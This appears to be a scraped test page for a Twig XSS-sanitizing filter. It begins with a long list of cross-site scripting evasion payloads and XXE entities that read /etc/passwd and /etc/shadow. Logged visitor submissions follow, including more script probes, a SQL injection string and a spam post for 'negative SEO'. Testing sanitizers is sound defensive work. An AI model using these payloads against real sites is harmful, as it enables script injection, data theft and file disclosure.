>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a;alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' "> >" '';!--"<XSS>=&{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=JaVaScRiPt:alert(&quot;XSS<WBR>&quot;)> <IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> <IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> <IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> <![CDATA[<script>var n=0;while(true){n++;}</script>]]> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('gotcha');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo> <?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foof> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///etc/shadow">]><foo>&xee;</foo> <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:///dev/random">]><foo>&xee;</foo> <script>alert('XSS')</script> %3cscript%3ealert('XSS')%3c/script%3e %22%3e%3cscript%3ealert('XSS')%3c/script%3e <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=javascript:alert('XSS')> <img src=xss onerror=alert(1)> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC="jav ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < <<SCRIPT>alert("XSS");//<</SCRIPT> %253cscript%253ealert(1)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> foo<script>alert(1)</script> <scr<script>ipt>alert(1)</scr</script>ipt> <SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <marquee onstart='javascript:alert('1');'>=(◕_◕)= <iframe src="http://ha.ckers.org/scriptlet.html"></iframe> <;/script>;<;script>;alert(1)<;/script>;

    keyword(s): test

    description: test

    by test | at 2020-11-23 00:02:54

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    %20h%20'%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(75,118,90,65,65,80,103,115,115),1),name_const(CHAR(75,118,90,65,65,80,103,115,115),1))a)%20--%20%22x%22=%22x

    result with twig: {{ xss.xss | escape }}:

    %20h%20'%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(75,118,90,65,65,80,103,115,115),1),name_const(CHAR(75,118,90,65,65,80,103,115,115),1))a)%20--%20%22x%22=%22x

    keyword(s):

    description:

    by s | at 2020-11-19 15:14:01

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asdasdasd

    result with twig: {{ xss.xss | escape }}:

    asdasdasd

    keyword(s):

    description:

    by asdad | at 2020-11-19 15:12:26

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    ">

    result with twig: {{ xss.xss | escape }}:

    "><img%20src=x%20onerror=alert(1)>

    keyword(s): ">

    description: ">

    by "> | at 2020-11-19 12:51:24

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    Competition not playing the game fair and square? Now you can fight back. Negative SEO, to make ranks go down: http://blackhat.to/

    result with twig: {{ xss.xss | escape }}:

    Competition not playing the game fair and square? Now you can fight back. Negative SEO, to make ranks go down: http://blackhat.to/

    keyword(s):

    description: Competition not playing the game fair and square? Now you can fight back. Negative SEO, to make ranks go down: http://blackhat.to/

    by Lukas Patterson | at 2020-11-18 11:51:11

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    333

    result with twig: {{ xss.xss | escape }}:

    333

    keyword(s): 222

    description: 1111111111

    by 111 | at 2020-11-18 08:54:11

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    body

    result with twig: {{ xss.xss | escape }}:

    body

    keyword(s):

    description:

    by a | at 2020-11-17 19:15:59

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    www.chaos.org

    result with twig: {{ xss.xss | escape }}:

    <a href="http://www.chaos.org/">www.chaos.org</a>

    keyword(s):

    description:

    by <a href="http://www.chaos.org/">www.chaos.org</a> | at 2020-11-17 19:14:16

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    <?';

    result with twig: {{ xss.xss | escape }}:

    <?';

    keyword(s):

    description:

    by <?'; | at 2020-11-17 17:09:26

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert ("W"); </script>

    keyword(s):

    description:

    by | at 2020-11-16 18:20:58

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert ("W"); </script>

    keyword(s): keyword

    description: script alert

    by autor | at 2020-11-16 18:18:32

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    ereq

    result with twig: {{ xss.xss | escape }}:

    ereq

    keyword(s): dasfsdf

    description:

    by fdsfsd | at 2020-11-16 18:17:01

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    safaf

    result with twig: {{ xss.xss | escape }}:

    safaf

    keyword(s): alert

    description: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    by | at 2020-11-16 18:15:15

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    result with twig: {{ xss.xss | escape }}:

    <script>alert(1)</script>

    keyword(s): kjk

    description: kjkjkj

    by | at 2020-11-16 09:40:11

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    Ut in tempor ipsum

    result with twig: {{ xss.xss | escape }}:

    Ut in tempor ipsum

    keyword(s): Magni possimus magn

    description: Inventore reiciendis

    by Consequat Perferend | at 2020-11-09 07:09:23

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    1

    result with twig: {{ xss.xss | escape }}:

    1

    keyword(s): 1

    description: 1

    by 1 | at 2020-11-07 13:40:57

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    asdf

    result with twig: {{ xss.xss | escape }}:

    asdf

    keyword(s):

    description: * Voraussetzung UMA 2.5.10 oder UMA NG 3.0.4, Microsoft<br> Exchange 2010, 2013, 2016 oder 2019. [Dokumentation](https://wiki.securepoint.de/UMA/SEWS-Tool)<br> [Changelog](https://wiki.securepoint.de/UMA/SEWS-Tool/Changelog)

    by asdf | at 2020-11-05 16:55:55

    result with twig: {% xss_clean %}{{ xss.xss | raw }}{% end_xss_clean %}:

    Hello, i try to your site

    result with twig: {{ xss.xss | escape }}:

    Hello, i try to <script>alert('Hack');</script> your site

    keyword(s): test

    description: Test

    by test | at 2020-11-03 09:35:39

    BY LARS MOELLEKEN WITH HATE IN 2015